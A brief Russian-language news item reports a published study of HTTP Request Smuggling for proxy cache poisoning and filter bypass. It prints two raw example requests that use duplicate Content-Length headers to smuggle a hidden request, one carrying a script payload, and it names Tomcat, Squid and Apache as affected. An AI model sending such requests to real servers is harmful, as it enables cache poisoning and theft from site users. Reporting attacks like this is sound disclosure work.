| Группа исследователей опубликовала документ описывающий новый вид атаки - "HTTP Request Smuggling" (HRS), направленный на подмену страниц в кеше прокси серверов и обход блокировок контент фильтров и фаерволов.
 Идея метода - компоновка нескольких POST/GET запросов в рамках одного HTTP обращения, например:
 
1      POST http://SITE/foobar.html HTTP/1.1 
2      Host: SITE 
3      Connection: Keep-Alive  
4      Content-Type: application/x-www-form-urlencoded 
5      Content-Length: 0 
6      Content-Length: 44 
7      [CRLF] 
8      GET /poison.html HTTP/1.1 
9      Host: SITE 
10     Bla: [space after the "Bla:", but no CRLF] 
11     GET http://SITE/page_to_poison.html HTTP/1.1 
12     Host: SITE 
13     Connection: Keep-Alive 
14     [CRLF] 
Пример 2:
1       POST /some_script.jsp HTTP/1.0 
2       Connection: Keep-Alive 
3       Content-Type: application/x-www-form-urlencoded 
4       Content-Length: 9 
5       Content-Length: 204 
6  
7       this=thatPOST /vuln_page.jsp HTTP/1.0 
8       Content-Type: application/x-www-form-urlencoded 
9       Content-Length: 95 
10  
11      param1=value1&data=alert("stealing...
Сообщается, что проблеме подвержены Tomcat, squid (исправлено в Squid-2.5.STABLE9), apache (mod_proxy ?) и т.д.
 
 |